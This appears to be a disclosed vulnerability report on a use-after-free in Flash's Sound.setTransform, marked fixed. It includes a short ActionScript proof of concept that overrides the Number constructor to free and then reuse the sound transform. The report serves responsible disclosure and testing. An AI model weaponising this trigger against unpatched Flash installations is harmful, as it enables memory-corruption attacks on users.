There is a use-after-free in Sound.setTransform, similar to the one reported is issue 568 (CVE-2015-8434). If the transform object provided is an integer primitive, and the Number constructor is overwritten, this constructor will be executed and can free the internal sound transform, which is then written to. A minimal proof-of-concept is as follows:
this.createEmptyMovieClip("my_mc", 1);
var my_sound:Sound = new Sound("my_mc");
_global.Number = func;
my_sound.attachSound("world");
my_sound.setTransform(7);
my_sound.start();
function func(){
my_mc.removeMovieClip();
this.ll = 7; // actually construct a transform
this.lr = 7;
this.rl =7;
this.rr = 7;
}
A PoC is attached. This PoC demonstrates the bug by allocating a new transform in the place of the freed one, and reading the values that get overwritten. The test fails (Flash is vulnerable) if the number written to the screen is 9999. The test passes if any other value is written. There are roughly 600 object types in Flash that are the same size as the object that is used after it is freed, so I suspect this issue is exploitable with enough effort.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Status: Fixed